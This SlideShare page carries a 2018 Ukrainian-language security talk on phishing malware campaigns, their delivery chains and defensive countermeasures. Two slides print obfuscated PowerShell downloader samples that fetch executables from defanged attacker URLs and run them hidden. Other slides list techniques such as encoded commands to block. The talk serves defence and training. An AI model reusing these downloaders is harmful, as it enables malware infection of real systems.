SlideShare uma empresa Scribd logo

Невивчені уроки або логи антивірусних війн

Vladyslav Radetsky
Vladyslav Radetsky

Огляд технік актуальних масових атак із використанням фішингових розсилок. Механізми доставки шкідливого коду. Поширені типи приманок та способи їх знешкодження. Помилки, яких припускаються ІТ та ІБ фахівці при реагуванні на інциденти. Те, про що забувають. Скрипти, powershell, вразливості MS Office. Типові ознаки malware та робота з ними.

Tecnologia
1 de 93
Baixar para ler offline
Невивчені уроки або логи антивірусних війн 12 / 07 / 18 Владислав Радецький vr@optidata.com.ua
#whoami Лінивий параноїк-зануда. Працюю у компанії OptiData Аналізую віруси. Пишу статті. Проводжу навчання з різних аспектів ІБ Допомагаю з проектуванням, впровадженням та супроводом засобів захисту Прийшов до вас щоб поділитися досвідом vr@optidata.com.ua radetskiy.wordpress.com
OptiData – хто ми є ? Ми – це команда спеціалістів з практичним досвідом інтеграції та супроводу рішень з ІБ. Працюємо лише з тим, в чому розбираємось. Більшість здійснених нами проектів захищені NDA. Проектуємо. Навчаємо. Розгортаємо. Захищаємо.
OptiData – розсилки IOC
Важливо ! Усе про що я говоритиму – моя особиста точка зору Усе, що ви сьогодні почуєте може не співпадати із офіційною позицією компанії Усі події та персонажі є вигаданими, а будь-які співпадіння є випадковими Вибачте, етика, NDA etc…
04/18 020418 - Ursnif #doc_res #rtf #11882 030418 - quantloader #js #WSH 040418 - quantloader #URL #VBS 040418 - Dyreza #old_twitter_API 060418 - Lokibot #ace #scr | #ramnit #exe 110418 - HawkEye #doc_res #rtf #11882 250418 - netwireRAT #W97M/Downloader Поточна ситуація по атакам
05/18 030518 - Pony #doc17_0119 #HTA #power 100518 - Adwind #JAR #WSH 110518 - Lokibot #11882 #rtf 150518 - trojan #XLS #macro #powershell 250518 - Lokibot #zip #exe 250518 - FlawedAmmyy #power 300518 - Lokibot #doc_res #rtf #11882 300518 - Pony #rtf #11882 #gz #exe Поточна ситуація по атакам
Поточна ситуація по атакам 06/18 040618 - DZ-WORM #W97M/Downloader 070618 - FlawedAmmyy (RAT) #iqy #powershell 140618 - LokiBot #packed #iso #exe 150618 - Grandcrab #WSH #powershell 150618 - Trickbot #W97M/Downloader #power 180618 - IE exploit 18-8174 #VBS #HTA #powershell 190618 - Adwind #JAR #WSH | #pony #gz #exe 200618 - Adwind #JAR #WSH | #pony #r11 #exe 210618 - HawkEye #11882 #rtf 220618 - pony #r11 #exe 260618 - fake_putty #upx 270618 - ransom #RSAUtil #decrypt 270618 - trojan #doc_res #rtf #11882
Поточна ситуація по атакам 07/18 040718 - Trickbot #W97M/Downloader #powershell 050718 - HawkEye #xlam #powershell 100718 - Lokibot #rtf #11882 100718 - Lokibot #ACE #SCR 110718 - trojan #rar #exe … To be continued .
Поточна ситуація по атакам 04/18 - 07/18 Всього – > 50 різних зразків MS Office – 17 розсилок з них: із застосуванням powershell – 7 розсилок із застосуванням 11882 – 8 розсилок Java Backdoor – 3 розсилки
Аналіз Порівняння із 2017-им
• Раніше: • %tmp%fixed_name.exe • WSH (vb*, js*) - 70% розсилок Що змінилося ? 1 Приманка 2 Payload
• Тепер: • %Public%random_name.exe • %AppData%*random_name.exe • %ProgramData%random_name.exe • Powershell - 70% розсилок Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload
Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload • Тепер: • АВ сигнатури із затримкою • Сигнатури генерують по 1му та 2му кроку • Спрацювання АВ – лише частина атаки • Крок 3 – перевірка параметрів системи
• Раніше: • Розповсюдження – окремо, С2 - окремо • Приманки (80%) працювали лише добу Що змінилося ?
• Тепер: • Розповсюдження та С2 у 80% - 1 хост • Приманки спрацьовують через 5-7 днів (!) Що змінилося ?
• Раніше: • Payload – exe, не кодований • Web віддавали payload без зайвих умов Що змінилося ?
• Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
• Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ? 3 downloader 4 payload
• Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
• Раніше: • 1 точка • 1 та сама контрольна сума Що змінилося ?
Що змінилося ? • Тепер: • Мімікрія • Зміна контрольних сум (Zbot, Dyreza, Trickbot)
Powershell • Основний інструмент завантаження та запуску
Powershell • Основний інструмент завантаження та запуску
Powershell powershell $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object - ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:vivedoc{.} rudocument/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start- Process $path;
Powershell 1st run cmd /c powershell "'powershell ""function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,''%tmp%xpvsvgw.exe'');start-process ''%tmp%xpvsvgw.exe'';}try{ysga(''h11p:icoindna{.}io/bri.ri'')}catch{ysga(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%dduuyd.bat; start-process '%tmp%dduuyd.bat' - windowstyle hidden" 2nd run cmd /c powershell "'powershell ""function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,''%tmp%nsxr.exe'');start-process ''%tmp%nsxr.exe'';}try{bxode(''h11p:icoindna{.} io/bri.ri'')}catch{bxode(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%ktph.bat; start-process '%tmp%ktph.bat' - windowstyle hidden" 3rd run cmd /c powershell "'powershell ""function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,''%tmp%bixi.exe'');start-process ''%tmp%bixi.exe'';}try{nnpsd(''h11p:icoindna{.} io/bri.ri'')}catch{nnpsd(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%wjqw.bat; start-process '%tmp%wjqw.bat' - windowstyle hidden"
Powershell
• Може комбінуватися з документами BITS
• Може комбінуватися з документами BITS
> Kafeine, malware.dontneed.coffee.com Web – exploits
> Kafeine, malware.dontneed.coffee.com Web – exploits
> radetskiy.wordpress.com Web – exploits
> radetskiy.wordpress.com Web – exploits
> Держ. архів Київської області Розповсюдження із скомпрометованих систем
> radetskiy.wordpress.com Розповсюдження із скомпрометованих систем
> radetskiy.wordpress.com Розповсюдження із скомпрометованих систем
Адекватні контрзаходи
Очищайте метадані (с) facebook > проект 6688
Очищайте метадані
Очищайте метадані
• Фільтр приєднань на рівні web/email - по заголовкам • Фільтр на рівні Web proxy - по User Agent - як на завантаження payload так і на зв’язок із С2 - • Пустий, test, bits, Mozilla 4.x etc – блок • В ідеалі – дозвіл лише актуальним IE, FF, Chrome • Аналіз SSL, заборона завантаження .ехе Перерізати канали доставки
• Фільтр по джерелу (web/email) .ua, .gov.ua etc – не довірені по замовчуванню • Взагалі, що стосується web трафіку – усе, що не довірене і не потрібне для роботи блок Перерізати канали доставки
• Execution Policy Bypass • Hidden PowerShell • PowerShell – WMI Script • PowerShell – Download • PowerShell – Encoded Command Powershell – контроль та блок
• Блок вихідного трафіку • Заборона запуску cmd, powershell, mshta (4User) • Заборона перехресного виклику • Заборона дочірніх процесів для MS Office • Заборона запису та зчитування небезпечних типів CMD, MSHTA, MS Office
MS Office OLE > PS
MS Office DDE > PS
MS Office 118882
MS Office Macro
• Зміст образів тестових ВМ • Адекватний час аналізу • Перевірка на інших збірках ОС та Office • Перевірка вручну • Перевірка на залізі Sandboxing
• Ізоляція на мережевому рівні • Затримка, оновлення в ручному режимі • Тестування оновлень Вимушене використання ПЗ (MEDoc та інші)
• aDS • ASD MS 17-010
• aDS • ASD MS 17-010
• aDS • ASD MS 17-010
#FuckResponsibleDisclosure
• Привілеї Адміністратора – не обов'язкові • Powershell, office, mshta • Повторне використання приманок • Зміна контрольних сум • Затримки при виконанні Поведінка при зараженні
• Для простих користувачів – пам'ятка на А4 • Для IT/IS – чітка послідовність процедур • Автономно без очікування команди зверху • Ізолювати, зібрати дані, перевстановити… Реагування на інциденти
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Атаки 2017го року
Україна. Кібератаки 2017го року
Україна. Кібератаки 2017го року WannaCry 12-15 травень +C2, Mimikatz, SMB, +service, -MBR, -MFT, -signed, $300 - $600
Україна. Кібератаки 2017го року xData 17-18 травень -C2, Mimikatz, SMB, -MBR, -MFT, -signed, $100 - $600
Україна. Кібератаки 2017го року PetyaA 27 червень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
Україна. Кібератаки 2017го року BadRabbit 24 жовтень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
Україна. Кібератаки 2017го року
Україна. Кібератаки 2017го року WannaCry xData PetyaA BadRabbit травень травень червень жовтень
MS17-010 – був опублікований 14 / 03 / 17 Mimikatz – був опублікований десь у 2011 Зауважте:
• Не достатньо просто знати про вразливість • Не достатньо розуміти як саме працює вразливість • Не достатньо поставити виправлення і заспокоїтись Що нам це дає?
Що змінилося для нас? Україна. Кібератаки 2017го року
• Частина змирилася і дбає лише про бекапи • Інша частина колекціонує IOC • 15-20% - почали змінювати захист Україна. Кібератаки 2017го року
Хто з вас проводить розслідування по детекту ? * по кожному спрацюванню систем захисту А звідки ви впевнені що АВ не впіймав лише хвіст ? Реагування на інциденти
Три історії з практики
Історія #1 “Макрос”
Історія #1 “Макрос” - 24.05.18
Історія #1 “Макрос” - 14.03.18 • Хтось відкриває документ 2013го року • Спрацьовує макрос – пандемія (файли .doc) • Розслідування, розстріли • За 5 годин усі документи на х00 системах інжектовано • А якби це був #Pony або Ransom ? • …
Історія #1 “Макрос” - 14.03.18
Історія #1 “Макрос” - 14.03.18
Історія #2 “Впертий ransomware”
Історія #2 “Впертий ransomware”
Історія #2 “Впертий ransomware” • Жертва отримує фішинг із приманкою • Запускається ransomware • “Ааааа, ваш антивірус пропустив…” • Надаю людині маркери + контрзаходи • Рекурсія, рекурсія, (сумно, боляче) • Зашифровано систему керівника • “То шо ви там казали, який параметр поставити?”
Історія #3 “Страх або як роблять новини про ІБ”
Історія #3 “Страх або як роблять новини про ІБ”
Історія #3 “Страх або як роблять новини про ІБ” • Хтось “качає” щось .. ок, це був фейковий AdobeFlash • Зараження, виведення АРМ з ладу • Чутки поширюються зі швидкістю світла • В одному міністерстві вирішують вимкнути сервери • Журналіст намагається зайти на сайт міністерства • 502 = “Ааааа! Хакери поламали міністерство”
Висновки
Висновки #1 • Інструкції на випадок атаки • Автономне прийняття рішень та контрзаходів • Службові розслідування, форензика • Мінімізація втрат • Навчання персоналу
Висновки #2 • Оновлення/виправлення MS Office та Windows ! ! ! • Блок створення / запуску C:Users***.exe • Контроль/блок WSH, PowerShell, HTA, CMD, MS Office • Посилена фільтрація Web та Email • Відмова від RTF, макросів, JRE, Flash
Запитання ? #IOC та звіти шукайте тут: radetskiy.wordpress.com
• Twitter • https://twitter.com/malwrhunterteam • https://twitter.com/James_inthe_box • https://twitter.com/DissectMalware • https://twitter.com/Techhelplistcom • https://twitter.com/malware_traffic • Blogs & Media • https://embedi.com/blog/ • https://www.wired.com/category/threatlevel/ • https://arstechnica.com/information-technology/2018/ • https://threatpost.com/ • https://security.googleblog.com/ • https://www.schneier.com/ • https://krebsonsecurity.com/ • https://www.troyhunt.com/ Джерела інформації:
• VirtualBox • SysInternals Suite, PSTools • Nirsoft tools • oletools (python) • Wireshark, Fiddler • Pestudio, Explorer Suite, PE Explorer Інструменти:
Дякую вам за увагу!

Recomendados

McAfee – конструктор Lego для ІБ
McAfee – конструктор Lego для ІБMcAfee – конструктор Lego для ІБ
McAfee – конструктор Lego для ІБVladyslav Radetsky
 
McAfee ENS 10.7 - що нового ?
McAfee ENS 10.7 - що нового ?McAfee ENS 10.7 - що нового ?
McAfee ENS 10.7 - що нового ?Vladyslav Radetsky
 
NSP та MWG - захист мережевого трафіку
NSP та MWG - захист мережевого трафікуNSP та MWG - захист мережевого трафіку
NSP та MWG - захист мережевого трафікуVladyslav Radetsky
 
"Мистецтво захисту бар'єрів"
"Мистецтво захисту бар'єрів""Мистецтво захисту бар'єрів"
"Мистецтво захисту бар'єрів"Vladyslav Radetsky
 
Робота із malware. McAfee ATD+TIE+DXL/OpenDXL
Робота із malware. McAfee ATD+TIE+DXL/OpenDXLРобота із malware. McAfee ATD+TIE+DXL/OpenDXL
Робота із malware. McAfee ATD+TIE+DXL/OpenDXLVladyslav Radetsky
 
Кіберзахист в умовах війни
Кіберзахист в умовах війниКіберзахист в умовах війни
Кіберзахист в умовах війниVladyslav Radetsky
 
Як не стати жертвою ?
Як не стати жертвою ?Як не стати жертвою ?
Як не стати жертвою ?Vladyslav Radetsky
 
Практичні рецепти захисту
Практичні рецепти захистуПрактичні рецепти захисту
Практичні рецепти захистуVladyslav Radetsky
 

Recomendados

McAfee – конструктор Lego для ІБ
McAfee – конструктор Lego для ІБMcAfee – конструктор Lego для ІБ
McAfee – конструктор Lego для ІБVladyslav Radetsky
 
McAfee ENS 10.7 - що нового ?
McAfee ENS 10.7 - що нового ?McAfee ENS 10.7 - що нового ?
McAfee ENS 10.7 - що нового ?Vladyslav Radetsky
 
NSP та MWG - захист мережевого трафіку
NSP та MWG - захист мережевого трафікуNSP та MWG - захист мережевого трафіку
NSP та MWG - захист мережевого трафікуVladyslav Radetsky
 
"Мистецтво захисту бар'єрів"
"Мистецтво захисту бар'єрів""Мистецтво захисту бар'єрів"
"Мистецтво захисту бар'єрів"Vladyslav Radetsky
 
Робота із malware. McAfee ATD+TIE+DXL/OpenDXL
Робота із malware. McAfee ATD+TIE+DXL/OpenDXLРобота із malware. McAfee ATD+TIE+DXL/OpenDXL
Робота із malware. McAfee ATD+TIE+DXL/OpenDXLVladyslav Radetsky
 
Кіберзахист в умовах війни
Кіберзахист в умовах війниКіберзахист в умовах війни
Кіберзахист в умовах війниVladyslav Radetsky
 
Як не стати жертвою ?
Як не стати жертвою ?Як не стати жертвою ?
Як не стати жертвою ?Vladyslav Radetsky
 
Практичні рецепти захисту
Практичні рецепти захистуПрактичні рецепти захисту
Практичні рецепти захистуVladyslav Radetsky
 
Практики застосування рішень McAfee. Історії успіху.
Практики застосування рішень McAfee. Історії успіху.Практики застосування рішень McAfee. Історії успіху.
Практики застосування рішень McAfee. Історії успіху.Vladyslav Radetsky
 
9 клас урок 16
9 клас урок 169 клас урок 16
9 клас урок 16Юлія Артюх
 
9 клас урок 15
9 клас урок 159 клас урок 15
9 клас урок 15Юлія Артюх
 
9 клас урок 17
9 клас урок 179 клас урок 17
9 клас урок 17Юлія Артюх
 
Логи (анти)вірусних війн 2019-2020
Логи (анти)вірусних війн 2019-2020Логи (анти)вірусних війн 2019-2020
Логи (анти)вірусних війн 2019-2020Vladyslav Radetsky
 
Check list: readiness for phishing attacks
Check list: readiness for phishing attacksCheck list: readiness for phishing attacks
Check list: readiness for phishing attacksNETWAVE
 
34
3434
34maksi100
 
Penetration Testing Practice 2015
Penetration Testing Practice 2015Penetration Testing Practice 2015
Penetration Testing Practice 2015Vladyslav Radetsky
 
Less16
Less16Less16
Less16Nikolay Shaygorodskiy
 
Xdebug (ukr)
Xdebug (ukr)Xdebug (ukr)
Xdebug (ukr)Anatoliy Okhotnikov
 
Сам собі sandbox або як перевіряти файли
Сам собі sandbox або як перевіряти файлиСам собі sandbox або як перевіряти файли
Сам собі sandbox або як перевіряти файлиVladyslav Radetsky
 
Як прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівЯк прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівStfalcon Meetups
 
Як прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівЯк прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівArtem Henvald
 
Корнілов Андрій
Корнілов АндрійКорнілов Андрій
Корнілов АндрійOleg Nazarevych
 
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...Fwdays
 
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ..."Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...Fwdays
 
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
"Request Lifecycle at Prom.ua", Vitaliy KharytonskiyFwdays
 
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in productionJS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in productionJSFestUA
 
Роман Савіцький, "Webcomponents & lit-element in production."
Роман Савіцький, "Webcomponents & lit-element in production."Роман Савіцький, "Webcomponents & lit-element in production."
Роман Савіцький, "Webcomponents & lit-element in production."Sigma Software
 
Типові помилки при впровадженні DLP
Типові помилки при впровадженні DLPТипові помилки при впровадженні DLP
Типові помилки при впровадженні DLPVladyslav Radetsky
 
"Instant loading: Improving your website speed", Yozhef Hisem
"Instant loading: Improving your website speed", Yozhef Hisem"Instant loading: Improving your website speed", Yozhef Hisem
"Instant loading: Improving your website speed", Yozhef HisemFwdays
 
10 asp.net
10 asp.net 10 asp.net
10 asp.net eleksdev
 

Mais conteúdo relacionado

Mais procurados

Практики застосування рішень McAfee. Історії успіху.
Практики застосування рішень McAfee. Історії успіху.Практики застосування рішень McAfee. Історії успіху.
Практики застосування рішень McAfee. Історії успіху.Vladyslav Radetsky
 
Логи (анти)вірусних війн 2019-2020
Логи (анти)вірусних війн 2019-2020Логи (анти)вірусних війн 2019-2020
Логи (анти)вірусних війн 2019-2020Vladyslav Radetsky
 
Check list: readiness for phishing attacks
Check list: readiness for phishing attacksCheck list: readiness for phishing attacks
Check list: readiness for phishing attacksNETWAVE
 
Penetration Testing Practice 2015
Penetration Testing Practice 2015Penetration Testing Practice 2015
Penetration Testing Practice 2015Vladyslav Radetsky
 

Mais procurados (9)

Практики застосування рішень McAfee. Історії успіху.
Практики застосування рішень McAfee. Історії успіху.Практики застосування рішень McAfee. Історії успіху.
Практики застосування рішень McAfee. Історії успіху.
 
9 клас урок 16
9 клас урок 169 клас урок 16
9 клас урок 16
 
9 клас урок 15
9 клас урок 159 клас урок 15
9 клас урок 15
 
9 клас урок 17
9 клас урок 179 клас урок 17
9 клас урок 17
 
Логи (анти)вірусних війн 2019-2020
Логи (анти)вірусних війн 2019-2020Логи (анти)вірусних війн 2019-2020
Логи (анти)вірусних війн 2019-2020
 
Check list: readiness for phishing attacks
Check list: readiness for phishing attacksCheck list: readiness for phishing attacks
Check list: readiness for phishing attacks
 
34
3434
34
 
Penetration Testing Practice 2015
Penetration Testing Practice 2015Penetration Testing Practice 2015
Penetration Testing Practice 2015
 
Less16
Less16Less16
Less16
 

Semelhante a Невивчені уроки або логи антивірусних війн

Сам собі sandbox або як перевіряти файли
Сам собі sandbox або як перевіряти файлиСам собі sandbox або як перевіряти файли
Сам собі sandbox або як перевіряти файлиVladyslav Radetsky
 
Як прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівЯк прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівStfalcon Meetups
 
Як прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівЯк прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівArtem Henvald
 
Корнілов Андрій
Корнілов АндрійКорнілов Андрій
Корнілов АндрійOleg Nazarevych
 
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...Fwdays
 
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ..."Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...Fwdays
 
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
"Request Lifecycle at Prom.ua", Vitaliy KharytonskiyFwdays
 
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in productionJS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in productionJSFestUA
 
Роман Савіцький, "Webcomponents & lit-element in production."
Роман Савіцький, "Webcomponents & lit-element in production."Роман Савіцький, "Webcomponents & lit-element in production."
Роман Савіцький, "Webcomponents & lit-element in production."Sigma Software
 
Типові помилки при впровадженні DLP
Типові помилки при впровадженні DLPТипові помилки при впровадженні DLP
Типові помилки при впровадженні DLPVladyslav Radetsky
 
"Instant loading: Improving your website speed", Yozhef Hisem
"Instant loading: Improving your website speed", Yozhef Hisem"Instant loading: Improving your website speed", Yozhef Hisem
"Instant loading: Improving your website speed", Yozhef HisemFwdays
 
10 asp.net
10 asp.net 10 asp.net
10 asp.net eleksdev
 
Stfalcon QA Meetup 31.01.2020
Stfalcon QA Meetup 31.01.2020Stfalcon QA Meetup 31.01.2020
Stfalcon QA Meetup 31.01.2020Stfalcon Meetups
 
Top mistakes that allows to make a successful pentest
Top mistakes that allows to make a successful pentestTop mistakes that allows to make a successful pentest
Top mistakes that allows to make a successful pentestGlib Pakharenko
 
Web Penetration Testing Report
Web Penetration Testing ReportWeb Penetration Testing Report
Web Penetration Testing ReportKR. Laboratories
 
"Incremental rollouts and rollbacks with business metrics control at every st...
"Incremental rollouts and rollbacks with business metrics control at every st..."Incremental rollouts and rollbacks with business metrics control at every st...
"Incremental rollouts and rollbacks with business metrics control at every st...Fwdays
 
'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020
'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020
'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020OdessaJS Conf
 
ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022
ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022
ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022GoQA
 

Semelhante a Невивчені уроки або логи антивірусних війн (20)

Xdebug (ukr)
Xdebug (ukr)Xdebug (ukr)
Xdebug (ukr)
 
Сам собі sandbox або як перевіряти файли
Сам собі sandbox або як перевіряти файлиСам собі sandbox або як перевіряти файли
Сам собі sandbox або як перевіряти файли
 
Як прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівЯк прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнів
 
Як прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнівЯк прокачати трьох студентів за п’ять тижнів
Як прокачати трьох студентів за п’ять тижнів
 
Корнілов Андрій
Корнілов АндрійКорнілов Андрій
Корнілов Андрій
 
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
Oleksandr Brychuk "UniSender architecture. Growth from 100kk to 1.5kkk letter...
 
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ..."Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
"Laravel Tips & Tricks - 7 Steps to Dramatically Improve Performance", Yehor ...
 
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
"Request Lifecycle at Prom.ua", Vitaliy Kharytonskiy
 
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in productionJS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
JS Fest 2019/Autumn. Роман Савіцький. Webcomponents & lit-element in production
 
Роман Савіцький, "Webcomponents & lit-element in production."
Роман Савіцький, "Webcomponents & lit-element in production."Роман Савіцький, "Webcomponents & lit-element in production."
Роман Савіцький, "Webcomponents & lit-element in production."
 
Типові помилки при впровадженні DLP
Типові помилки при впровадженні DLPТипові помилки при впровадженні DLP
Типові помилки при впровадженні DLP
 
"Instant loading: Improving your website speed", Yozhef Hisem
"Instant loading: Improving your website speed", Yozhef Hisem"Instant loading: Improving your website speed", Yozhef Hisem
"Instant loading: Improving your website speed", Yozhef Hisem
 
10 asp.net
10 asp.net 10 asp.net
10 asp.net
 
Stfalcon QA Meetup 31.01.2020
Stfalcon QA Meetup 31.01.2020Stfalcon QA Meetup 31.01.2020
Stfalcon QA Meetup 31.01.2020
 
ASP.Net basics
ASP.Net basics ASP.Net basics
ASP.Net basics
 
Top mistakes that allows to make a successful pentest
Top mistakes that allows to make a successful pentestTop mistakes that allows to make a successful pentest
Top mistakes that allows to make a successful pentest
 
Web Penetration Testing Report
Web Penetration Testing ReportWeb Penetration Testing Report
Web Penetration Testing Report
 
"Incremental rollouts and rollbacks with business metrics control at every st...
"Incremental rollouts and rollbacks with business metrics control at every st..."Incremental rollouts and rollbacks with business metrics control at every st...
"Incremental rollouts and rollbacks with business metrics control at every st...
 
'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020
'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020
'Worker threads vs c++ addons' by Novokhatskyi Oleksii at OdessaJS'2020
 
ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022
ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022
ЛОЛІТА ПАЛЬОХА «Процес тестування: від бізнес-вимог до релізу» Online QADay 2022
 

Mais de Vladyslav Radetsky

2й фактор для телефону
2й фактор для телефону2й фактор для телефону
2й фактор для телефонуVladyslav Radetsky
 
Безпека телефонів для ЗСУ, ТРО та волонтерів
Безпека телефонів для ЗСУ, ТРО та волонтерівБезпека телефонів для ЗСУ, ТРО та волонтерів
Безпека телефонів для ЗСУ, ТРО та волонтерівVladyslav Radetsky
 
Cybersecurity during real WAR [English version]
Cybersecurity during real WAR [English version]Cybersecurity during real WAR [English version]
Cybersecurity during real WAR [English version]Vladyslav Radetsky
 
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threatBasic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threatVladyslav Radetsky
 
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.Vladyslav Radetsky
 
Типові помилки при впровадженні DLP #2
Типові помилки при впровадженні DLP #2Типові помилки при впровадженні DLP #2
Типові помилки при впровадженні DLP #2Vladyslav Radetsky
 
